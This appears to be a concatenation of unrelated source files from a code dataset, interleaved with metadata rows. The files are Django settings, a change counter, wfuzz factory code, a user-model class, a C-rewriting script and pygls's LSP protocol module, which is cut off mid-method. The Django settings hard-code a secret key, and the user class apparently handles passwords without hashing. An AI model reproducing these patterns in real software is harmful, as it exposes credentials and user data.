)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'dev.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.abspath(os.path.join(PROJ_ROOT, 'media', 'uploads'))
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/uploads/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.abspath(os.path.join(PROJ_ROOT, 'media', 'static'))
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'g2_39yupn*6j4p*cg2%w643jiq-1n_annua*%i8+rq0dx9p=$n'
ROOT_URLCONF = 'example.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(PROJ_ROOT, 'templates'),
)
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'massmedia',
'django.contrib.flatpages',
'testapp',
'mathfilters',
)
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
MMEDIA_IMAGE_STORAGE = 'media_storage.MediaStorage'
MASSMEDIA_SERVICES = {
'YOUTUBE': {
'EMAIL': '',
'USERNAME': '',
'PASSWORD': '',
},
}
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
|
apache-2.0
| -6,627,286,543,488,898,000
| 32.975806
| 123
| 0.688346
| false
| 3.555274
| false
| false
| false
|
liamneath1/hailey.io
|
hailey_web/hailey_api/migrations/0001_initial.py
|
1
|
1312
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-05-14 22:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='StockMarket',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ticker_code', models.CharField(max_length=20)),
('index_code', models.IntegerField()),
('date', models.DateField()),
('open_price', models.FloatField()),
('close_price', models.FloatField(blank=True, null=True)),
('high_price', models.FloatField(blank=True, null=True)),
('low_price', models.FloatField(blank=True, null=True)),
('volume', models.FloatField(blank=True, null=True)),
('misc', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'stockmarket',
},
),
migrations.AlterUniqueTogether(
name='stockmarket',
unique_together=set([('ticker_code', 'index_code', 'date')]),
),
]
|
mit
| 1,092,914,653,890,573,000
| 33.526316
| 114
| 0.539634
| false
| 4.373333
| false
| false
| false
|
macedir/Software-Development
|
Python/P1.py
|
1
|
1648
|
# KYLE'S CHANGE COUNTER VERSION 1000
# INCLUDES UNSOLVABLE PENNY ERROR
import math
dict = {
100: 'hundred dollar bill',
50: 'fifty dollar bill',
20: 'twenty dollar bill',
10: 'ten dollar bill',
5: 'five dollar bill',
2: 'toonie',
1: 'loonie',
.25: 'quarter',
.10: 'dime',
.05: 'nickel',
.01: 'penny'
}
newDict = {}
##target = 999.99
##wl = target
while True:
print(' ')
inputamnt = input("How much? ")
try:
wl = float(inputamnt)
target = wl
def determineAmount(work, factor):
amountReq = work // factor
#amountReqFull = amountReq * factor
return amountReq
print('For $' + str(target) + ', you will need:')
for k in sorted(dict, reverse = True):
workInt = math.floor((determineAmount(wl, k)))
wl = (wl - (workInt*k))
newDict[k] = workInt
if workInt is not 0:
if k is not .01:
if workInt > 1:
print(str(workInt) + ' ' + dict[k] + 's')
else:
print(str(workInt) + ' ' + dict[k])
elif workInt > 1:
print(str(workInt) + ' pennies')
else:
print(str(workInt) + ' penny')
print(' ')
print('Margin of error of +-1 penny\n------------------------------')
except ValueError:
print('That is not a number\n------------------------------\n')
|
gpl-3.0
| 3,040,184,352,776,137,700
| 27.428571
| 77
| 0.426578
| false
| 3.806005
| false
| false
| false
|
xmendez/wfuzz
|
src/wfuzz/factories/fuzzresfactory.py
|
1
|
4150
|
import copy
from .fuzzfactory import reqfactory
from .payman import payman_factory
from ..fuzzobjects import FuzzResult, FuzzType, FuzzWord, FuzzWordType
from ..helpers.obj_factory import ObjectFactory, SeedBuilderHelper
class FuzzResultFactory(ObjectFactory):
def __init__(self):
ObjectFactory.__init__(
self,
{
"fuzzres_from_options_and_dict": FuzzResultDictioBuilder(),
"fuzzres_from_allvar": FuzzResultAllVarBuilder(),
"fuzzres_from_recursion": FuzzResRecursiveBuilder(),
"seed_from_recursion": SeedRecursiveBuilder(),
"seed_from_options": SeedResultBuilder(),
"seed_from_options_and_dict": FuzzResultDictSeedBuilder(),
"baseline_from_options": BaselineResultBuilder(),
},
)
class FuzzResultDictioBuilder:
def __call__(self, options, dictio_item):
res = copy.deepcopy(options["compiled_seed"])
res.item_type = FuzzType.RESULT
res.discarded = False
res.payload_man.update_from_dictio(dictio_item)
res.update_from_options(options)
SeedBuilderHelper.replace_markers(res.history, res.payload_man)
res.nres = next(FuzzResult.newid)
return res
class SeedResultBuilder:
def __call__(self, options):
seed = reqfactory.create("seed_from_options", options)
res = FuzzResult(seed)
res.payload_man = payman_factory.create("payloadman_from_request", seed)
return res
class BaselineResultBuilder:
def __call__(self, options):
raw_seed = reqfactory.create("request_from_options", options)
baseline_payloadman = payman_factory.create(
"payloadman_from_baseline", raw_seed
)
if baseline_payloadman.payloads:
res = FuzzResult(raw_seed)
res.payload_man = baseline_payloadman
res.update_from_options(options)
res.is_baseline = True
SeedBuilderHelper.replace_markers(raw_seed, baseline_payloadman)
return res
else:
return None
class FuzzResultAllVarBuilder:
def __call__(self, options, var_name, payload):
fuzzres = copy.deepcopy(options["compiled_seed"])
fuzzres.item_type = FuzzType.RESULT
fuzzres.discarded = False
fuzzres.payload_man = payman_factory.create("empty_payloadman", payload)
fuzzres.payload_man.update_from_dictio([payload])
fuzzres.history.wf_allvars_set = {var_name: payload.content}
fuzzres.nres = next(FuzzResult.newid)
return fuzzres
class FuzzResultDictSeedBuilder:
def __call__(self, options, dictio):
fuzzres = copy.deepcopy(dictio[0].content)
fuzzres.history.update_from_options(options)
fuzzres.update_from_options(options)
fuzzres.payload_man = payman_factory.create("empty_payloadman", dictio[0])
fuzzres.payload_man.update_from_dictio(dictio)
return fuzzres
class SeedRecursiveBuilder:
def __call__(self, seed):
new_seed = copy.deepcopy(seed)
new_seed.history.url = seed.history.recursive_url + "FUZZ"
new_seed.rlevel += 1
if new_seed.rlevel_desc:
new_seed.rlevel_desc += " - "
new_seed.rlevel_desc += seed.payload_man.description()
new_seed.item_type = FuzzType.SEED
new_seed.discarded = False
new_seed.payload_man = payman_factory.create(
"payloadman_from_request", new_seed.history
)
return new_seed
class FuzzResRecursiveBuilder:
def __call__(self, seed, url):
fr = copy.deepcopy(seed)
fr.history.url = str(url)
fr.rlevel = seed.rlevel + 1
if fr.rlevel_desc:
fr.rlevel_desc += " - "
fr.rlevel_desc += seed.payload_man.description()
fr.item_type = FuzzType.BACKFEED
fr.discarded = False
fr.is_baseline = False
fr.payload_man = payman_factory.create(
"empty_payloadman", FuzzWord(url, FuzzWordType.WORD)
)
return fr
resfactory = FuzzResultFactory()
|
gpl-2.0
| -3,708,989,993,210,402,300
| 31.170543
| 82
| 0.630361
| false
| 3.608696
| false
| false
| false
|
WayStudios/fora
|
fora/core/user.py
|
1
|
3473
|
# fora
# class User
# Xu [xw901103@gmail.com] Copyright 2015
from fora.core.dbsession import (
DBSession,
OR
)
from fora.models.user import UserModel
import uuid
from datetime import datetime
class User(object):
""" This class contains core functionality of fora user manipulation.
"""
model = None
def __init__(self):
self.model = None
def exists(self):
return self.model != None
def is_guest(self):
return self.model == None
def id(self):
return self.model.id
def uuid(self, new_uuid = None):
if not new_uuid:
return self.model.uuid
self.model.uuid = new_uuid
def email_address(self, new_email_address = None):
if not new_email_address:
return self.model.email_address
self.model.email_address = new_email_address
def username(self, new_username = None):
if not new_username:
return self.model.username
self.model.username = new_username
def password(self, new_password = None):
if not new_password:
return self.model.password
self.model.password = new_password
def is_active(self, new_is_active = None):
if new_is_active == None:
return self.model.is_active
self.model.is_active = new_is_active
def is_deleted(self, new_is_deleted = None):
if new_is_deleted == None:
return self.model.is_deleted
self.model.is_deleted = new_is_deleted
def create_date(self, new_create_date = None):
if not new_create_date:
return self.model.create_date
self.model.create_date = new_create_date
def update_date(self, new_update_date = None):
if not new_update_date:
return self.model.update_date
self.model.update_date = new_update_date
@staticmethod
def get_user_by_uuid(uuid):
result = DBSession.query(UserModel).filter(UserModel.uuid == uuid).first()
obj = User()
obj.model = result
return obj
@staticmethod
def get_user_by_email_address(email_address):
result = DBSession.query(UserModel).filter(UserModel.email_address == email_address).first()
obj = User()
obj.model = result
return obj
@staticmethod
def get_user_by_username(username):
result = DBSession.query(UserModel).filter(UserModel.username == username).first()
obj = User()
obj.model = result
return obj
@staticmethod
def get_user_by_identity(identity):
result = DBSession.query(UserModel).filter(OR(UserModel.username == identity, UserModel.email_address == identity, UserModel.uuid == identity)).first()
obj = User()
obj.model = result
return obj
@staticmethod
def get_users():
results = DBSession.query(UserModel).all()
objs = {}
for result in results:
objs[result.id] = User()
objs[result.id].model = result
return objs
@staticmethod
def create_user(username, email_address, password, is_active = True, is_deleted = False):
result = UserModel(uuid = str(uuid.uuid4()), email_address = email_address, username = username, password = password, is_active = is_active, is_deleted = is_deleted, create_date = datetime.utcnow(), update_date = datetime.utcnow())
DBSession.add(result)
obj = User()
obj.model = result
return obj
|
bsd-3-clause
| -2,055,657,441,272,897,500
| 35.557895
| 239
| 0.624532
| false
| 3.893498
| false
| false
| false
|
phate/jive
|
scripts/arrayliterals.py
|
1
|
2660
|
import re
import sys
r = re.compile('([a-zA-Z0-9_*_ ]*\\[\\]) *')
r = re.compile('\\(([a-zA-Z0-9_*_ ]*)\\[\\]\\)')
def scan_stmt_starts(text):
starts = []
next_line_stmt = False
beginning_decl = False
nested_decls = set()
depth = 0
for n in range(len(text)):
c = text[n]
if c == '{':
if beginning_decl:
nested_decls.add(depth)
depth += 1
elif c == '}':
depth -= 1
if depth in nested_decls:
nested_decls.remove(depth)
elif c == '=':
beginning_decl = True
if c not in '= \t\n':
beginning_decl = False
if c == ';' or c == '{' or c == '}':
next_line_stmt = not bool(nested_decls)
elif c == '\n' and next_line_stmt:
starts.append((n + 1, get_indent(text, n + 1)))
next_line_stmt = False
else:
next_line_stmt = False
assert depth == 0
return starts
def get_indent(text, pos):
indent = ''
while pos < len(text) and text[pos] == '\t':
indent += text[pos]
pos += 1
return indent
#for start, indent in scan_stmt_starts(text):
#print '---'
#print indent, start
#print text[start:text.find('\n', start)]
def find_stmt_start(text, pos):
last_start, last_indent = 0, ''
for start, indent in scan_stmt_starts(text):
if start > pos:
return last_start, last_indent
last_start = start
last_indent = indent
return last_start, last_indent
def find_closing_brace(text, pos):
depth = 1
while depth > 0 and pos < len(text):
if text[pos] in '([{':
depth += 1
elif text[pos] in ')]}':
depth -= 1
pos += 1
return pos
def is_macro_def(text, pos):
while pos > 0:
if text[pos] == '#':
return True
elif text[pos] == '\n':
return False
else:
pos -= 1
return False
def convert_single(text, counter):
for m in r.finditer(text):
start, end = m.start(), m.end()
if is_macro_def(text, start):
continue
arraytype = m.group(1)
stmt_start, stmt_indent = find_stmt_start(text, start)
values_start = text.find('{', end)
values_end = find_closing_brace(text, values_start + 1)
values = text[values_start:values_end]
before_stmt = text[:stmt_start]
var = 'tmparray%d' % counter
inserted_tmp = stmt_indent + arraytype + ' ' + var +'[] = ' + values + ';\n';
remainder = text[stmt_start:start] + var + text[values_end:]
return text[:stmt_start] + inserted_tmp + remainder
return None
def convert_all(text):
counter = 0
while True:
new_text = convert_single(text, counter)
if not new_text: return text
text = new_text
counter += 1
filename = sys.argv[1]
text = file(filename).read()
new_text = convert_all(text)
if new_text != text:
sys.stderr.write(filename + '\n')
file(filename, 'w').write(new_text)
|
lgpl-2.1
| 9,154,337,267,762,679,000
| 20.803279
| 79
| 0.608271
| false
| 2.733813
| false
| false
| false
|
glenngillen/dotfiles
|
.vscode/extensions/ms-python.python-2021.5.842923320/pythonFiles/lib/jedilsp/pygls/protocol.py
|
1
|
29516
|
############################################################################
# Copyright(c) Open Law Library. All rights reserved. #
# See ThirdPartyNotices.txt in the project root for additional notices. #
# #
# Licensed under the Apache License, Version 2.0 (the "License") #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http: // www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
############################################################################
import asyncio
import enum
import functools
import json
import logging
import re
import sys
import traceback
import uuid
from collections import namedtuple
from concurrent.futures import Future
from functools import partial
from itertools import zip_longest
from typing import List
from pygls.capabilities import ServerCapabilitiesBuilder
from pygls.constants import ATTR_FEATURE_TYPE
from pygls.exceptions import (JsonRpcException, JsonRpcInternalError, JsonRpcInvalidParams,
JsonRpcMethodNotFound, JsonRpcRequestCancelled,
MethodTypeNotRegisteredError)
from pygls.feature_manager import (FeatureManager, assign_help_attrs, get_help_attrs,
is_thread_function)
from pygls.lsp import (JsonRPCNotification, JsonRPCRequestMessage, JsonRPCResponseMessage,
get_method_params_type, get_method_return_type, is_instance)
from pygls.lsp.methods import (CLIENT_REGISTER_CAPABILITY, CLIENT_UNREGISTER_CAPABILITY, EXIT,
TEXT_DOCUMENT_PUBLISH_DIAGNOSTICS, WINDOW_LOG_MESSAGE,
WINDOW_SHOW_MESSAGE, WORKSPACE_APPLY_EDIT, WORKSPACE_CONFIGURATION,
WORKSPACE_EXECUTE_COMMAND)
from pygls.lsp.types import (ApplyWorkspaceEditParams, ApplyWorkspaceEditResponse, Diagnostic,
DidChangeTextDocumentParams, DidChangeWorkspaceFoldersParams,
DidCloseTextDocumentParams, DidOpenTextDocumentParams,
ExecuteCommandParams, InitializeParams, InitializeResult,
LogMessageParams, MessageType, PublishDiagnosticsParams,
RegistrationParams, ShowMessageParams, UnregistrationParams,
WorkspaceEdit)
from pygls.uris import from_fs_path
from pygls.workspace import Workspace
logger = logging.getLogger(__name__)
def call_user_feature(base_func, method_name):
"""Wraps generic LSP features and calls user registered feature
immediately after it.
"""
@functools.wraps(base_func)
def decorator(self, *args, **kwargs):
ret_val = base_func(self, *args, **kwargs)
try:
user_func = self.fm.features[method_name]
self._execute_notification(user_func, *args, **kwargs)
except KeyError:
pass
except Exception:
logger.exception('Failed to handle user defined notification "%s": %s',
method_name, args)
return ret_val
return decorator
def dict_to_object(**d):
"""Create nested objects (namedtuple) from dict."""
type_name = d.pop('type_name', 'Object')
return json.loads(
json.dumps(d),
object_hook=lambda p: namedtuple(type_name, p.keys(), rename=True)(*p.values())
)
def default_serializer(o):
"""JSON serializer for complex objects."""
if isinstance(o, enum.Enum):
return o.value
return o.__dict__
def deserialize_command(params):
"""Function used to deserialize command arguments to a specific class
or a namedtuple."""
# TODO: Register/Look up custom command arguments' types
# Currently command parameters are type of 'any', but eventually we would
# want to register an argument type of our custom command and to
# deserialize it properly.
temp_obj = dict_to_object(**params, type_name='CommandParams')
params['arguments'] = getattr(temp_obj, 'arguments', None)
return params
def deserialize_params(data, get_params_type):
"""Function used to deserialize params to a specific class."""
try:
method = data['method']
params = data['params']
if not isinstance(params, dict):
return data
try:
params_type = get_params_type(method)
if params_type is None:
params_type = dict_to_object
elif params_type.__name__ == ExecuteCommandParams.__name__:
params = deserialize_command(params)
except MethodTypeNotRegisteredError:
params_type = dict_to_object
try:
data['params'] = params_type(**params)
except TypeError:
raise ValueError(
f'Could not instantiate "{params_type.__name__}" from params: {params}')
except KeyError:
pass
return data
def deserialize_message(data, get_params_type=get_method_params_type):
"""Function used to deserialize data received from client."""
if 'jsonrpc' in data:
try:
deserialize_params(data, get_params_type)
except ValueError:
raise JsonRpcInvalidParams()
if 'id' in data:
if 'method' in data:
return JsonRPCRequestMessage(**data)
else:
return JsonRPCResponseMessage(**data)
else:
return JsonRPCNotification(**data)
return data
def to_lsp_name(method_name):
"""Convert method name to LSP real name
Example:
text_document__did_open -> textDocument/didOpen
"""
method_name = method_name.replace('__', '/')
m_chars = list(method_name)
m_replaced = []
for i, ch in enumerate(m_chars):
if ch == '_':
continue
if m_chars[i - 1] == '_':
m_replaced.append(ch.capitalize())
continue
m_replaced.append(ch)
return ''.join(m_replaced)
class JsonRPCProtocol(asyncio.Protocol):
"""Json RPC protocol implementation using on top of `asyncio.Protocol`.
Specification of the protocol can be found here:
https://www.jsonrpc.org/specification
This class provides bidirectional communication which is needed for LSP.
"""
CANCEL_REQUEST = '$/cancelRequest'
CHARSET = 'utf-8'
CONTENT_TYPE = 'application/vscode-jsonrpc'
MESSAGE_PATTERN = re.compile(
rb'^(?:[^\r\n]+\r\n)*'
+ rb'Content-Length: (?P<length>\d+)\r\n'
+ rb'(?:[^\r\n]+\r\n)*\r\n'
+ rb'(?P<body>{.*)',
re.DOTALL,
)
VERSION = '2.0'
def __init__(self, server):
self._server = server
self._shutdown = False
self._client_request_futures = {}
self._server_request_futures = {}
self.fm = FeatureManager(server)
self.transport = None
self._message_buf = []
def __call__(self):
return self
def _check_ret_type_and_send_response(self, method_name, method_type, msg_id, result):
"""Check if registered feature returns appropriate result type."""
if method_type == ATTR_FEATURE_TYPE:
return_type = get_method_return_type(method_name)
if not is_instance(result, return_type):
error = JsonRpcInternalError().to_dict()
self._send_response(msg_id, error=error)
self._send_response(msg_id, result=result)
def _execute_notification(self, handler, *params):
"""Executes notification message handler."""
if asyncio.iscoroutinefunction(handler):
future = asyncio.ensure_future(handler(*params))
future.add_done_callback(self._execute_notification_callback)
else:
if is_thread_function(handler):
self._server.thread_pool.apply_async(handler, (*params, ))
else:
handler(*params)
def _execute_notification_callback(self, future):
"""Success callback used for coroutine notification message."""
if future.exception():
error = JsonRpcInternalError.of(sys.exc_info()).to_dict()
logger.exception('Exception occurred in notification: "%s"', error)
# Revisit. Client does not support response with msg_id = None
# https://stackoverflow.com/questions/31091376/json-rpc-2-0-allow-notifications-to-have-an-error-response
# self._send_response(None, error=error)
def _execute_request(self, msg_id, handler, params):
"""Executes request message handler."""
method_name, method_type = get_help_attrs(handler)
if asyncio.iscoroutinefunction(handler):
future = asyncio.ensure_future(handler(params))
self._client_request_futures[msg_id] = future
future.add_done_callback(partial(self._execute_request_callback,
method_name, method_type, msg_id))
else:
# Can't be canceled
if is_thread_function(handler):
self._server.thread_pool.apply_async(
handler, (params, ),
callback=partial(
self._check_ret_type_and_send_response,
method_name, method_type, msg_id,
),
error_callback=partial(self._execute_request_err_callback, msg_id))
else:
self._check_ret_type_and_send_response(
method_name, method_type, msg_id, handler(params))
def _execute_request_callback(self, method_name, method_type, msg_id, future):
"""Success callback used for coroutine request message."""
try:
if not future.cancelled():
self._check_ret_type_and_send_response(
method_name, method_type, msg_id, result=future.result())
else:
self._send_response(
msg_id,
error=JsonRpcRequestCancelled(f'Request with id "{msg_id}" is canceled')
)
self._client_request_futures.pop(msg_id, None)
except Exception:
error = JsonRpcInternalError.of(sys.exc_info()).to_dict()
logger.exception('Exception occurred for message "%s": %s', msg_id, error)
self._send_response(msg_id, error=error)
def _execute_request_err_callback(self, msg_id, exc):
"""Error callback used for coroutine request message."""
exc_info = (type(exc), exc, None)
error = JsonRpcInternalError.of(exc_info).to_dict()
logger.exception('Exception occurred for message "%s": %s', msg_id, error)
self._send_response(msg_id, error=error)
def _get_handler(self, feature_name):
"""Returns builtin or used defined feature by name if exists."""
try:
return self.fm.builtin_features[feature_name]
except KeyError:
try:
return self.fm.features[feature_name]
except KeyError:
raise JsonRpcMethodNotFound.of(feature_name)
def _handle_cancel_notification(self, msg_id):
"""Handles a cancel notification from the client."""
future = self._client_request_futures.pop(msg_id, None)
if not future:
logger.warning('Cancel notification for unknown message id "%s"', msg_id)
return
# Will only work if the request hasn't started executing
if future.cancel():
logger.info('Cancelled request with id "%s"', msg_id)
def _handle_notification(self, method_name, params):
"""Handles a notification from the client."""
if method_name == JsonRPCProtocol.CANCEL_REQUEST:
self._handle_cancel_notification(params.id)
return
try:
handler = self._get_handler(method_name)
self._execute_notification(handler, params)
except KeyError:
logger.warning('Ignoring notification for unknown method "%s"', method_name)
except Exception:
logger.exception('Failed to handle notification "%s": %s', method_name, params)
def _handle_request(self, msg_id, method_name, params):
"""Handles a request from the client."""
try:
handler = self._get_handler(method_name)
# workspace/executeCommand is a special case
if method_name == WORKSPACE_EXECUTE_COMMAND:
handler(params, msg_id)
else:
self._execute_request(msg_id, handler, params)
except JsonRpcException as e:
logger.exception('Failed to handle request %s %s %s', msg_id, method_name, params)
self._send_response(msg_id, None, e.to_dict())
except Exception:
logger.exception('Failed to handle request %s %s %s', msg_id, method_name, params)
err = JsonRpcInternalError.of(sys.exc_info()).to_dict()
self._send_response(msg_id, None, err)
def _handle_response(self, msg_id, result=None, error=None):
"""Handles a response from the client."""
future = self._server_request_futures.pop(msg_id, None)
if not future:
logger.warning('Received response to unknown message id "%s"', msg_id)
return
if error is not None:
logger.debug('Received error response to message "%s": %s', msg_id, error)
future.set_exception(JsonRpcException.from_dict(error))
else:
logger.debug('Received result for message "%s": %s', msg_id, result)
future.set_result(result)
def _procedure_handler(self, message):
"""Delegates message to handlers depending on message type."""
if message.jsonrpc != JsonRPCProtocol.VERSION:
logger.warning('Unknown message "%s"', message)
return
if self._shutdown and getattr(message, 'method', '') != EXIT:
logger.warning('Server shutting down. No more requests!')
return
if isinstance(message, JsonRPCNotification):
logger.debug('Notification message received.')
self._handle_notification(message.method, message.params)
elif isinstance(message, JsonRPCResponseMessage):
logger.debug('Response message received.')
self._handle_response(message.id, message.result, message.error)
elif isinstance(message, JsonRPCRequestMessage):
logger.debug('Request message received.')
self._handle_request(message.id, message.method, message.params)
def _send_data(self, data):
"""Sends data to the client."""
if not data:
return
try:
body = data.json(by_alias=True, exclude_unset=True, encoder=default_serializer)
logger.info('Sending data: %s', body)
body = body.encode(self.CHARSET)
header = (
f'Content-Length: {len(body)}\r\n'
f'Content-Type: {self.CONTENT_TYPE}; charset={self.CHARSET}\r\n\r\n'
).encode(self.CHARSET)
self.transport.write(header + body)
except Exception:
logger.error(traceback.format_exc())
def _send_response(self, msg_id, result=None, error=None):
"""Sends a JSON RPC response to the client.
Args:
msg_id(str): Id from request
result(any): Result returned by handler
error(any): Error returned by handler
"""
response = JsonRPCResponseMessage(id=msg_id,
jsonrpc=JsonRPCProtocol.VERSION,
result=result,
error=error)
if error is None:
del response.error
else:
del response.result
self._send_data(response)
def connection_lost(self, exc):
"""Method from base class, called when connection is lost, in which case we
want to shutdown the server's process as well.
"""
logger.error('Connection to the client is lost! Shutting down the server.')
sys.exit(1)
def connection_made(self, transport: asyncio.BaseTransport):
"""Method from base class, called when connection is established"""
self.transport = transport
def data_received(self, data: bytes):
"""Method from base class, called when server receives the data"""
logger.debug('Received %r', data)
while len(data):
# Append the incoming chunk to the message buffer
self._message_buf.append(data)
# Look for the body of the message
message = b''.join(self._message_buf)
found = JsonRPCProtocol.MESSAGE_PATTERN.fullmatch(message)
body = found.group('body') if found else b''
length = int(found.group('length')) if found else 1
if len(body) < length:
# Message is incomplete; bail until more data arrives
return
# Message is complete;
# extract the body and any remaining data,
# and reset the buffer for the next message
body, data = body[:length], body[length:]
self._message_buf = []
# Parse the body
self._procedure_handler(
json.loads(body.decode(self.CHARSET),
object_hook=deserialize_message))
def notify(self, method: str, params=None):
"""Sends a JSON RPC notification to the client."""
logger.debug('Sending notification: "%s" %s', method, params)
request = JsonRPCNotification(
jsonrpc=JsonRPCProtocol.VERSION,
method=method,
params=params
)
self._send_data(request)
def send_request(self, method, params=None, callback=None):
"""Sends a JSON RPC request to the client.
Args:
method(str): The method name of the message to send
params(any): The payload of the message
Returns:
Future that will be resolved once a response has been received
"""
msg_id = str(uuid.uuid4())
logger.debug('Sending request with id "%s": %s %s', msg_id, method, params)
request = JsonRPCRequestMessage(
id=msg_id,
jsonrpc=JsonRPCProtocol.VERSION,
method=method,
params=params
)
future = Future()
# If callback function is given, call it when result is received
if callback:
def wrapper(future: Future):
result = future.result()
logger.info('Configuration for %s received: %s', params, result)
callback(result)
future.add_done_callback(wrapper)
self._server_request_futures[msg_id] = future
self._send_data(request)
return future
def send_request_async(self, method, params=None):
"""Calls `send_request` and wraps `concurrent.futures.Future` with
`asyncio.Future` so it can be used with `await` keyword.
Args:
method(str): The method name of the message to send
params(any): The payload of the message
Returns:
`asyncio.Future` that can be awaited
"""
return asyncio.wrap_future(self.send_request(method, params))
def thread(self):
"""Decorator that mark function to execute it in a thread."""
return self.fm.thread()
class LSPMeta(type):
"""Wraps LSP built-in features (`bf_` naming convention).
Built-in features cannot be overridden but user defined features with
the same LSP name will be called after them.
"""
def __new__(mcs, cls_name, cls_bases, cls):
for attr_name, attr_val in cls.items():
if callable(attr_val) and attr_name.startswith('bf_'):
method_name = to_lsp_name(attr_name[3:])
wrapped = call_user_feature(attr_val, method_name)
assign_help_attrs(wrapped, method_name, ATTR_FEATURE_TYPE)
cls[attr_name] = wrapped
logger.debug('Added decorator for lsp method: "%s"', attr_name)
return super().__new__(mcs, cls_name, cls_bases, cls)
class LanguageServerProtocol(JsonRPCProtocol, metaclass=LSPMeta):
"""A class that represents language server protocol.
It contains implementations for generic LSP features.
Attributes:
workspace(Workspace): In memory workspace
"""
def __init__(self, server):
super().__init__(server)
self.workspace = None
self._register_builtin_features()
def _register_builtin_features(self):
"""Registers generic LSP features from this class."""
for name in dir(self):
attr = getattr(self, name)
if callable(attr) and name.startswith('bf_'):
lsp_name = to_lsp_name(name[3:])
self.fm.add_builtin_feature(lsp_name, attr)
def apply_edit(self, edit: WorkspaceEdit, label: str = None) -> \
ApplyWorkspaceEditResponse:
"""Sends apply edit request to the client."""
return self.send_request(WORKSPACE_APPLY_EDIT,
ApplyWorkspaceEditParams(edit=edit, label=label))
def bf_exit(self, *args):
"""Stops the server process."""
self.transport.close()
sys.exit(0 if self._shutdown else 1)
def bf_initialize(self, params: InitializeParams):
"""Method that initializes language server.
It will compute and return server capabilities based on
registered features.
"""
logger.info('Language server initialized %s', params)
self._server.process_id = params.process_id
# Initialize server capabilities
self.client_capabilities = params.capabilities
self.server_capabilities = ServerCapabilitiesBuilder(
self.client_capabilities,
self.fm.features.keys(),
self.fm.feature_options,
list(self.fm.commands.keys()),
self._server.sync_kind,
).build()
logger.debug('Server capabilities: %s', self.server_capabilities.dict())
root_path = params.root_path
root_uri = params.root_uri or from_fs_path(root_path)
# Initialize the workspace
workspace_folders = params.workspace_folders or []
self.workspace = Workspace(root_uri, self._server.sync_kind, workspace_folders)
return InitializeResult(capabilities=self.server_capabilities)
def bf_initialized(self, *args):
"""Notification received when client and server are connected."""
pass
def bf_shutdown(self, *args):
"""Request from client which asks server to shutdown."""
for future in self._client_request_futures.values():
future.cancel()
for future in self._server_request_futures.values():
future.cancel()
self._shutdown = True
return None
def bf_text_document__did_change(self,
params: DidChangeTextDocumentParams):
"""Updates document's content.
(Incremental(from server capabilities); not configurable for now)
"""
for change in params.content_changes:
self.workspace.update_document(params.text_document, change)
def bf_text_document__did_close(self,
params: DidCloseTextDocumentParams):
"""Removes document from workspace."""
self.workspace.remove_document(params.text_document.uri)
def bf_text_document__did_open(self,
params: DidOpenTextDocumentParams):
"""Puts document to the workspace."""
self.workspace.put_document(params.text_document)
def bf_workspace__did_change_workspace_folders(
self,
params: DidChangeWorkspaceFoldersParams):
"""Adds/Removes folders from the workspace."""
logger.info('Workspace folders changed: %s', params)
added_folders = params.event.added or []
removed_folders = params.event.removed or []
for f_add, f_remove in zip_longest(added_folders, removed_folders):
if f_add:
self.workspace.add_folder(f_add)
if f_remove:
self.workspace.remove_folder(f_remove.uri)
def bf_workspace__execute_command(self,
